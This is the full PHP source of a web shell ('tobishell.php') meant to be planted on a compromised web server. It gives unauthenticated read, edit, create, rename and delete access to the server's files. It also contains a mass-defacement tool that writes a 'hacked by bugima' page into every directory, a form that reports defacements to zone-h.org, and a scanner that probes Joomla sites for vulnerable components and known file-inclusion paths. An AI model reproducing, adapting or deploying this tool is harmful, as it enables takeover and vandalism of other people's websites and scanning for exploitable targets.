tobishell.php

<?php
$self = $_SERVER['PHP_SELF'];
$dir = $_GET["dir"];
$nampak = $_GET["nampak"];
$edit = $_POST["edit"];
$rename = $_GET["rename"];
$namakan = $_POST["namakan"];
$padam = $_GET["padam"];
$autodeface = $_GET["ok"];
$zonhi = $_GET["bugi"];
$dapatdir = $_GET["buatdir"];
$jumlabah = $_GET["jumlabah"];
$newfile = $_POST["newfile"];
$editnew = $_POST["editnew"];
$cretnew = $_GET["cretnew"];


function zonmas()
    {
echo '<center>
<form action="" method="post">
<div id="option">
<font class="res"><p>Defacer<br />
<span class="ok"><input type="text" name="defacer" class="ibtn" /></span> </p>
<p>How to hack <br /><select class="ibtn" name="hackmode">
<option >--------SELECT--------</option>
<option value="1">known vulnerability (i.e. unpatched system)</option>
<option
value="2" >undisclosed (new) vulnerability</option>
<option
value="3" >configuration / admin. mistake</option>
<option
value="4" >brute force attack</option>
<option
value="5" >social engineering</option>
<option
value="6" >Web Server intrusion</option>
<option
value="7" >Web Server external module intrusion</option>
<option
value="8" >Mail Server intrusion</option>
<option
value="9" >FTP Server intrusion</option>
<option
value="10" >SSH Server intrusion</option>
<option
value="11" >Telnet Server intrusion</option>
<option
value="12" >RPC Server intrusion</option>
<option
value="13" >Shares misconfiguration</option>
<option
value="14" >Other Server intrusion</option>
<option
value="15" >SQL Injection</option>
<option
value="16" >URL Poisoning</option>
<option
value="17" >File Inclusion</option>
<option
value="18" >Other Web Application bug</option>
<option
value="19" >Remote administrative panel access through bruteforcing</option>
<option
value="20" >Remote administrative panel access through password guessing</option>
<option
value="21" >Remote administrative panel access through social engineering</option>
<option
value="22" >Attack against the administrator/user (password stealing/sniffing)</option>
<option
value="23" >Access credentials through Man In the Middle attack</option>
<option
value="24" >Remote service password guessing</option>
<option
value="25" >Remote service password bruteforce</option>
<option
value="26" >Rerouting after attacking the Firewall</option>
<option
value="27" >Rerouting after attacking the Router</option>
<option
value="28" >DNS attack through social engineering</option>
<option
value="29" >DNS attack through cache poisoning</option>
<option
value="30" >Not available</option>
</select></p>
<p> Cause of hack ? <br /><select class="ibtn" name="reason">
<option >--------SELECT--------</option>
<option
value="1" >Heh...just for fun!</option>
<option
value="2" >Revenge against that website</option>
<option
value="3" >Political reasons</option>
<option
value="4" >As a challenge</option>
<option
value="5" >I just want to be the best defacer</option>
<option
value="6" >Patriotism</option>
<option
value="7" >Not available</option>
</select> </p>
<p>Sites <br />
<span class="fur">Put all the sites on the server</span><br />
<span class=""><textarea name="domain" class="conten"></textarea></span> </p>
<p><button type="submit" value="Send" class="vutun"/>SEND</button>
</font></form>
<br>
</div>
</center>';
}


echo '<div class="adiv"><center><img src="http://blog.flamingtext.com/blog/2013/07/14/flamingtext_com_1373813801_580797130.gif"></center><br /><div class="atas"><font class="os">Operating System:<font class="res">'.php_uname().PHP_OS.'</font><br />
Total HDD:<font class="res">'.disk_total_space("/").' bytes</font><br />
Total Freespace:<font class="res">'.disk_free_space("/").' bytes</font>
</font>


</div>
<div class="tool"><a class="autodefacebtn" href="'.$self.'?ok=haha">Auto Deface Tool</a><a class="autodefacebtn" href="'.$self.'?">Filemanager</a><a class="autodefacebtn" href="'.$self.'?bugi=haha">zone-h</a><a class="autodefacebtn" href="'.$self.'?jumlabah=haha">Joomla COM scanner</a>
</div>


';

//TOOL AUTODEFACE

function autodeface()
{
  echo '<br />
<font class="up">AUTO DEFACE TOOL</font>
<br /><font class="os"><form action="" method="post">
file name&nbsp;&nbsp;:<br />
<input class="ibtn" name="nameauto" value="bugima.php" width="70%"><br />
folder path:<br />
<input class="ibtn" name="pathauto" width="70%" value="'.getcwd().'/"><br />
content:<br /><textarea class="conten" name="contentauto" cols="30" rows="30">hacked by bugima</textarea><br />
<button class="vutun" type="submit">Deface</button>
</form></font>';
}


//zonh tool


$hacker = $_POST['defacer'];
$method = $_POST['hackmode'];
$reson = $_POST['reason'];
$site = $_POST['domain'];


if($site != null)
  { $allsite = preg_split('/(\r?\n)+/', $site);
foreach($allsite as $sites)
{
$k = curl_init("http://zone-h.org/notify/single");
curl_setopt($k,CURLOPT_POST,true);
curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $sites."&hackmode=".$method."&reason=".$reson);
curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
$tetek = curl_exec($k);
curl_close($k);
}

}
else
{
}


//untuk open direktory dan file


function kasilist()
{
$dir = $_GET["dir"];
   $fol = scandir($dir);
       foreach($fol as $fo)
         {
   if($fo === ".")
{
$dirname = dirname($dir);
echo "<div class='line'><a class='up' href='".$self."?dir=".$dirname."'><<</a>";
}
elseif($fo === "..")
{
$dirname = dirname($dir);
echo "<a class='up' href='".$self."?dir=".$dirname."'>UP</a><a href='".$self."?buatdir=".$dir."' class='buatdir'>Make dir</a><a href='".$self."?cretnew=".$dir."/newfile.php' class='buatdir'>Make File</a></div>";
}
else
{
         $isdir = is_file($dir."/".$fo);
              if($isdir === false)
                 {

                          echo "<div class='line'><a class='dir' href='".$self."?dir=".$dir."/".$fo."'>".$fo."</a><a class='rename' href='".$self."?rename=".$dir."/".$fo."'>&nbsp;&nbsp;Rename</a>
<a class='rename' href='".$self."?padam=".$dir."/".$fo."'>&nbsp;&nbsp;Delete</a><font class='filesize'>".filesize($dir."/".$fo)." bytes</font>
</div>";

               }
           else
              {
             echo "<div class='line'><a class='link' href='".$self."?nampak=".$dir."/".$fo."'>".$fo."</a><a class='rename' href='".$self."?rename=".$dir."/".$fo."'>&nbsp;&nbsp;Rename</a>
<a class='rename' href='".$self."?padam=".$dir."/".$fo."'>&nbsp;&nbsp;Delete</a><font class='filesize'>".filesize($dir."/".$fo)." bytes</font>
</div>";
                }

            }
        }
}

function kaslist()
{
$fol2 = scandir(getcwd());
foreach($fol2 as $fo2)
         {

if($fo2 === ".")
{
$dirname = dirname(getcwd().$fo2);
echo "<div class='line'><a class='up' href='".$self."?dir=".$dirname."'><<".$fo."</a>";
}
elseif($fo2 === "..")
{
$dirname = dirname(getcwd().$fo2);
echo "<a class='up' href='".$self."?dir=".$dirname."'>UP".$fo."</a><a href='".$self."?buatdir=".getcwd()."' class='buatdir'>Make dir</a><a href='".$self."?cretnew=".getcwd()."/newfile.php' class='buatdir'>Make File</a></div>";
}
else
{
             $isdir2 = is_dir($fo2);
              if($isdir2 === true)
                {
$root = getcwd();

            echo "<div class='line'><a class='dir' href='".$self."?dir=".$root."/".$fo2."'>".$fo2."</a>
<a class='rename' href='".$self."?rename=".$root."/".$fo2."'>&nbsp;&nbsp;Rename</a>
<a class='rename' href='".$self."?padam=".$root."/".$fo2."'>&nbsp;&nbsp;Delete</a>
<font class='filesize'>".filesize($root."/".$fo2)." bytes</font>
</div>";
                }
               else
               {

             echo "<div class='line'><a class='link' href='".$self."?nampak=".$root."/".$fo2."'>".$fo2."</a><a class='rename' href='".$self."?rename=".$root."/".$fo2."'>&nbsp;&nbsp;Rename</a>
<a class='rename' href='".$self."?padam=".$root."/".$fo2."'>&nbsp;&nbsp;Delete</a>
<font class='filesize'>".filesize($root."/".$fo2)." bytes</font>
</div>";
                }
        }
     }
}


function untukopen()
{
$nampak = $_GET["nampak"];
$content = file_get_contents($nampak);
echo "<font class='up'>EDIT FILE<br /></font><form action='' method='post'>
          <textarea class='conten' name='edit'>".$content."</textarea><br />
          <button type='submit' class='vutun'>Save</button>
          </form><br />";

$back = dirname($nampak);
echo "<a class='up' href='".$self."?dir=".$back."'><<</a>";

}

//untuk buat file


function untukbuatfile()
{
echo "<font class='up'>CREATE FILE<br /></font><form action='' method='post'>
          <font class='os'>Content:<br /><textarea class='conten' name='editnew'>".$content."</textarea><br />
          File name:<br /><input name='newfile' class='ibtn' value='".$_GET["cretnew"]."'><br /></font>
          <button type='submit' class='vutun'>Save</button>
          </form><br />";

$back = dirname($nampak);
echo "<a class='up' href='".$self."?dir=".$back."'><<</a>";

}

//untuk open file

if($rename != null)
{
echo '<font class="up">RENAME FILE<br /></font><form action="" method="post">
         <input name="namakan" value="'.$rename.'" class="ibtn">
         <br /><button type="submit" class="rbtn">rename</button>
         </form>';
}
     else
      {
        if($nampak != null)
         {
          untukopen();
         }
        elseif($autodeface != null)
        {
        autodeface();
        }
        elseif($zonhi != null)
         {
         zonmas();
         }
        elseif($dapatdir != null)
        {
        buatdir();
        }
        elseif($jumlabah != null)
        {
        jomlascn();
        }
        elseif($cretnew != null)
        {
         untukbuatfile();
         }
       else
        {
               If($dir != null)
           {
           $dir = $_GET["dir"];
           kasilist();
           }
        else
          {
           $dir = $_GET["dir"];
           kaslist();
          }

       }
    }


//untuk hide


//untuk edit file

if($edit != null)
{

$file = fopen($nampak,"w");
                   fwrite($file,$edit);
                   fclose($file);

echo "<br /><font class='result'>File Saved</font>";
}
else
{
}

//untuk buat file


if($newfile != null)
{

$filenew = fopen($newfile,"w");
                   fwrite($filenew,$editnew);
                   fclose($filenew);

echo "<br /><font class='result'>File Saved</font>";
}
else
{
}


//untuk rename file


if($namakan != null)
{
rename($rename,$namakan);
echo "<font class='result'>Renamed</font>";
}
else
{
}


//untuk padam file

if($padam != null)
{
unlink($padam);
echo "<font class='result'>deleted</font>";
}
else
{
}


//TOOL AUTODEFACE FUNGSI

$defA = $_POST["nameauto"];
$conA = $_POST["contentauto"];
$dirA = $_POST["pathauto"];
$folA = scandir($dirA);

if($defA != null)
{


    foreach($folA as $foA)
      {

          if(is_dir($dirA.$foA) === true)
               {
                   $fileA = fopen($dirA.$foA.'/'.$defA,"w");
                   fwrite($fileA,$conA);
                   fclose($fileA);
                   echo '<a class="dir" href="http://'.$foA.'/'.$defA.'">'.$foA.'</a><font class="res">:::defaced</font><br />';
                }
                   else
                {
                 }
        }
}
else
{
}

//buat dir


function buatdir()
{
echo '<form action="" method="post"><font class="os">Dir Name:<br /></font><input name="mdir" class="ibtn" value="'.$_GET["buatdir"].'/newdir"><br />
<button type="submit" class="rbtn">Make Directory</button></form>';
}
$mdir = $_POST["mdir"];

if($mdir != null)
{
mkdir($mdir, 0700);
echo "<font class='res'>dir created</font>";
}
else
{
}

//JOOMLA COMPONENT

function jomlascn()
{
echo '<form action="" method="post">
<font class="os">Url:</font><br /><input name="urljom" class="ibtn" value="http://example.com">
<button type="submit" class="rbtn">SCAN</button>
</form>';
}


$urljom = $_POST["urljom"];

if($urljom != null)
{
$comx = "/index.php?option=com_collector
/index.php?option=com_jemessenger
/index.php?option=com_ksadvertiser
/index.php?option=com_jce
/index.php?option=com_svmap
/index.php?option=com_NeoRecruit
/index.php?option=com_facebook
/index.php?option=com_jdownloads
/index.php?option=com_movm
/index.php?option=com_restaurante
/index.php?option=com_frontpage
/index.php?option=com_ignitegallery
/index.php?option=com _if_surfalert
/index.php?option=com_newsfeeds
/index.php?option=com_fss
/index.php?option=com_jobprofile
/index.php?option=com_wrapper
/index.php?option=com_jphoto
/index.php?option=com_acymailing
/index.php?option=spidercatalog
/index.php?option=com_joomla_flash_uploader
/index.php?option=com_myalbum
/index.php?option=com_ponygallery
/index.php?option=com_tag
/index.php?option=com_rsfiles
/index.php?option=com_qcontacts
/index.php?option=com_races
/index.php?option=com_bch
/index.php?option=com_idoblog
/index.php?option=com_user
/index.php?option=com_beeheard
/index.php?option=com_rsform
/index.php?option=com_xsstream-dm
/index.php?option=com_virtuemart
/index.php?option=com_fireboard
/index.php?option=com_clasifier
/index.php?option=com_joomloads
/index.php?option=com_na_content
/index.php?option=com_pms
/index.php?option=com_media_library
/index.php?option=com_simpleshop
/index.php?option=com_gmaps
/index.php?option=com_rpx
/index.php?option=com_album
/index.php?option=com_books
/index.php?option=com_product
/index.php?option=com_pccookbook
/index.php?option=com_fabrik
/index.php?option=com_phocagallery
/index.php?option=com_kunena
/index.php?option=com_content
/index.php?option=com_facileforms
/index.php?option=com_cpg
/index.php?option=com_smf
/index.php?option=com_rsgallery
/index.php?option=com_mtree
/index.php?option=com_galleria
/index.php?option=com_mgm
/index.php?option=com_webring
/index.php?option=com_a6mambocredits
/index.php?option=com_uhp
/index.php?option=com_cropimage
/index.php?option=com_linkdirectory
/index.php?option=com_comprofiler
/index.php?option=com_phpshop
/index.php?option=com_artlinks
/index.php?option=com_remository
/index.php?option=com_performs
/index.php?option=com_extended_registration
/index.php?option=com_zoom
/index.php?option=com_serverstat
/index.php?option=com_simpleboard
/index.php?option=com_extcalendar
/components/com_facileforms/facileforms.frame.php?ff_compath=
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=
/components/com_zoom/includes/database.php?mosConfig_absolute_path=
/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=
/components/com_performs/performs.php?mosConfig_absolute_path=
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=
/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=
/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=
/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=
/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=
/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=
/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=
/administrator/components/com_webring/admin.webring.docs.php?component_dir=
/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=
/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=
/components/com_performs/performs.php?mosConfig_absolute_path=
/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=
/components/com_smf/smf.php?mosConfig_absolute_path=
/components/com_cpg/cpg.php?mosConfig_absolute_path=
/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=
/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=
/components/com_simpleboard
/components/com_extcalendar";

  $arrayjom = preg_split('/(\r?\n)+/', $comx);


foreach($arrayjom as $allcom)
{

 $tazjom = curl_init($urljom.$allcom);

curl_setopt($tazjom, CURLOPT_RETURNTRANSFER, true);


$tobjom = curl_exec($tazjom);
curl_close($tazjom);

if($tobjom === false)
{

}
else
{


$ti = strripos($tobjom, "404");
$ta = strripos($tobjom, "not exist");
$te = strripos($tobjom, "ponent not found");


if($ti === false & $ta === false & $te === false)
{
echo "<font class='os'>its have:<font class='res'>".$allcom."</font> component</font><br />";

}
else
{

}
}
}
}
else
{
}


?>


<style>
body
{
background-color:black;
}
.line
{
border:2px green outset;
width:100%;
}
.linerext
{
text-shadow: 0 0 20px green;
font-color:green;
}
.conten
{
border:2px green outset;
width:70%;
height:400px;
}
.vutun
{
border:2px red outset;
width:70%;
color:white;
background-color:red;
}
.link
{
text-shadow: 0 0 20px green;
color:white;
text-decoration:none;
color:green;
}
.rename
{
float:right;
text-shadow: 0 0 20px white;
color:white;
text-decoration:none;
background-color:red;

}
.dir
{
text-shadow: 0 0 20px white;
color:white;
text-decoration:none;
background-color:grey;
}
.ibtn
{
border:2px red outset;
width:60%;
color:red;
background-color:black;
}
.rbtn
{
border:2px red outset;
width:60%;
color:white;
background-color:red;
}
.up
{
text-shadow: 0 0 20px red;
color:red;
font-size:30px;
text-decoration:none;
}
.result
{
text-shadow: 0 0 20px white;
color:white;
font-size:20px;
text-decoration:none;
}
.os
{
text-shadow: 0 0 20px white;
color:white;
font-size:20px;
text-decoration:none;
}
.atas
{
border:3px grey #333333;
background-color:#333333;
width:100%;
}
.res
{
text-shadow: 0 0 20px red;
color:red;
font-size:20px;
text-decoration:none;
}
.tool
{
border:3px outset #005533;
background-color:#005533;
width:100%;
}
.tol
{
text-shadow: 0 0 20px white;
color:white;
text-decoration:none;
background-color:red;
width:20px;
}
.autodefacebtn {
    -moz-box-shadow:inset 2px 15px 0px 0px #f29c93;
    -webkit-box-shadow:inset 2px 15px 0px 0px #f29c93;
    box-shadow:inset 2px 15px 0px 0px #f29c93;
    background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #fe1a00), color-stop(1, #ce0100) );
    background:-moz-linear-gradient( center top, #fe1a00 5%, #ce0100 100% );
    filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#fe1a00', endColorstr='#ce0100');
    background-color:#fe1a00;
    -moz-border-radius:3px;
    -webkit-border-radius:3px;
    border-radius:3px;
    border:1px solid #d83526;
    display:inline-block;
    color:#ffffff;
    font-family:arial;
    font-size:15px;
    font-weight:bold;
    padding:6px 24px;
    text-decoration:none;
    text-shadow:1px 1px 0px #b23e35;
}.autodefacebtn:hover {
    background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #ce0100), color-stop(1, #fe1a00) );
    background:-moz-linear-gradient( center top, #ce0100 5%, #fe1a00 100% );
    filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ce0100', endColorstr='#fe1a00');
    background-color:#ce0100;
}.autodefacebtn:active {
    position:relative;
    top:1px;
}
.buatdir
{
float:right;
text-shadow: 0 0 20px white;
color:white;
text-decoration:none;
background-color:red;
}
.filesize
{
float:right;
text-shadow: 0 0 20px white;
color:white;
text-decoration:none;
}
.adiv
{
border:3px grey outset;
width:100%;
}
</style>
 </div>
<object width="0" height="0"><param name="movie" value="http://www.youtube.com/v/8o1q8VXmiE8?version=3&amp;hl=en_US&autoplay=1&loop=1"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/8o1q8VXmiE8?version=3&amp;hl=en_US&autoplay=1&loop=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="1" height="0"></embed></object>